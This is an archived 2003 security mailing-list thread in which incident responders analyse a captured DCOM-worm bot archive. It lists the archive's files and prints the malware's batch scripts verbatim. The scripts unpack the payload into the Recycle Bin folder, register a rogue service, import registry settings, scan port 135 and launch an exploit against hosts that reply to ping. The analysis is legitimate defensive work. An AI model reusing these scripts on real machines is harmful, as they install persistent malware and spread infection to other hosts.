RE: DCOM bot.rar

From: Dowling, Gabrielle (dowlingg_at_sullcrom.com)
Date: 08/20/03

  • Next message: Juri Haberland: "Re: possible 0-day exploit for latest Real-/Helixserver 9.0.2.794"
    Date: Wed, 20 Aug 2003 01:15:01 -0400
    To: "Schmehl, Paul L" <pauls@utdallas.edu>, <laj@swordlord.com>, <incidents@securityfocus.com>
    
    

    Has anyone submitted this to an av vendor? The lucomupdate.dll on its face is troubling, as it correlates to lucomupdate.exe, which is sav's autoupdater. I have not checked any of the other files listed....

    G

     -----Original Message-----
    From: Schmehl, Paul L
    Sent: Wed Aug 20 00:10:47 2003
    To: laj@swordlord.com; incidents@securityfocus.com
    Subject: RE: DCOM bot.rar

    Typical warez site stuff. Looks like the warez kiddies are using the
    worms to create new file repositories. Did you run strings on any of
    the files?

    Paul Schmehl (pauls@utdallas.edu)
    Adjunct Information Security Officer
    The University of Texas at Dallas
    AVIEN Founding Member
    http://www.utdallas.edu/~pauls/

    > -----Original Message-----
    > From: Andrej [mailto:laj@swordlord.com]
    > Sent: Tuesday, August 19, 2003 4:22 AM
    > To: incidents@securityfocus.com
    > Subject: DCOM bot.rar
    >
    >
    > I was finally able to get bot.rar...
    > Here is the archive list:
    > Archive bot.rar
    >
    > Name               Size  Packed Ratio Date     Time  Attr   CRC      Meth Ver
    > -----------------------------------------------------------------------------
    > winole.exe       572928  566724   98% 22-07-03 18:47 .....A 6E1BA67C m3e  2.9
    > wmpx.exe          43383   35139   80% 07-08-03 02:01 .....A 0A73E7CB m3e  2.9
    > wx11.bat            109     109  100% 06-08-03 18:29 .....A BA641709 m0e  2.9
    > wx12.bat            194     166   85% 07-08-03 03:28 .....A 66A7E567 m3e  2.9
    > wx12.exe          19618   10055   51% 06-08-03 20:55 .....A 273D03A0 m3e  2.9
    > logs                  0       0    0% 07-08-03 14:22 .D.... 00000000 m0   2.0
    > unrar.bat           169     137   81% 06-08-03 18:22 .....A 4E276E39 m3e  2.9
    > UnRAR.exe        194048   87237   44% 16-06-03 18:32 ...... B638F78C m3e  2.9
    > bnc.cfg              76      75   98% 27-07-03 16:48 .....A 03CDF0A3 m3e  2.9
    > Clear.exe         28672   11962   41% 16-06-03 18:32 .....A FBA086F4 m3e  2.9
    > click.exe         32768    6149   18% 16-06-03 18:32 .....A EA3874C5 m3e  2.9
    > CRC.EXE           24096    8231   34% 16-06-03 21:41 .....A D2158CA5 m3e  2.9
    > cygwin1.dll      971080  375803   38% 17-06-03 03:06 .....A 7337F48A m3e  2.9
    > deploy.bat          274     185   67% 06-08-03 18:20 .....A A3DA5EC6 m3e  2.9
    > dhcpp.exe         69632   28908   41% 16-06-03 18:32 .....A 2CA5E915 m3e  2.9
    > drvx.dll           2853    1215   42% 06-08-03 21:03 .....A 5956B0F0 m3e  2.9
    > events.exe       134656   37316   27% 22-07-03 17:58 .....A 0EF30C5D m3e  2.9
    > jesus.dll          4254    1275   29% 07-08-03 01:21 .....A BFF39F13 m3e  2.9
    > LucomServer.dll     802     484   60% 06-08-03 18:00 .....A 4C649F72 m3e  2.9
    > msoft.dll           206     128   62% 24-07-03 00:13 .....A 8DF17003 m3e  2.9
    > nctl.exe         569344  542111   95% 26-07-03 21:12 .....A F0C7F7AA m3e  2.9
    > pslist.exe        49152   21746   44% 16-06-03 21:41 .....A ED211211 m3e  2.9
    > Q019204.EXE       21584   10136   46% 16-06-03 21:41 .....A 212BBC50 m3e  2.9
    > reg.reg             773     432   55% 04-08-03 14:23 .....A 6FE50066 m3e  2.9
    > service.exe       63488   26461   41% 01-07-03 10:40 .....A 78DBBEF8 m3e  2.9
    > service.txt         176     129   73% 06-08-03 18:02 .....A E63DBB36 m3e  2.9
    > SFind.exe        266752  263546   98% 07-08-03 02:04 .....A 76BB24D4 m3e  2.9
    > start.dll          6153    1745   28% 07-08-03 14:22 .....A 303AF0E8 m3e  2.9
    > users.dll         75017   23205   30% 07-08-03 01:22 .....A EE2F60B1 m3e  2.9
    > -----------------------------------------------------------------------------
    >              29 3152257 2060809   65%
    >
    >
    > the .bat files are below:
    > ::::::::::::::
    > deploy.bat
    > ::::::::::::::
    > cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004
    > mkdir "logs"
    > copy bot.rar
    > c:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\LOGS\
    > net stop WinOLE
    > service.exe -r WinOLE
    > service.exe service.txt
    > %SYSTEMROOT%\regedit.exe -S reg.reg
    > net start WinOLE
    > exit
    > ::::::::::::::
    > unrar.bat
    > ::::::::::::::
    > cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
    >
    > attrib -r bot.rar
    > attrib -r unrar.exe
    > attrib -r unrar.bat
    >
    > unrar.exe x bot.rar
    > start deploy.bat
    > EXIT
    > ::::::::::::::
    > wx11.bat
    > ::::::::::::::
    > cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
    > ECHO. > RPC.dll
    > sfind -p 135 %1 %2
    > del RPC.dll
    > ::::::::::::::
    > wx12.bat
    > ::::::::::::::
    > cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
    > ECHO. > rpcf.dll
    > ping -n 1 %2 | find "Reply"
    > if errorlevel 1 goto end
    > wx12.exe 1 %2 %1
    > wx12.exe 0 %2 %1
    > :end
    > del rpcf.dll
    > exit
    >
    >
    > ---------------------------------------------------------------------------
    > Captus Networks - Integrated Intrusion Prevention and Traffic Shaping
    > - Instantly Stop DoS/DDoS Attacks, Worms & Port Scans
    > - Automatically Control P2P, IM and Spam Traffic
    > - Ensure Reliable Performance of Mission Critical Applications
    > - Precisely Define and Implement Network Security and Performance Policies
    > **FREE Vulnerability Assessment Toolkit - WhitePapers - Live Demo
    > Visit us at: http://www.securityfocus.com/sponsor/CaptusNetworks_incidents_030814
    > ---------------------------------------------------------------------------
    >
    >

    **********************************************************************
    This e-mail is sent by a law firm and contains information
    that may be privileged and confidential. If you are not the
    intended recipient, please delete the e-mail and notify us
    immediately.
    ***********************************************************************
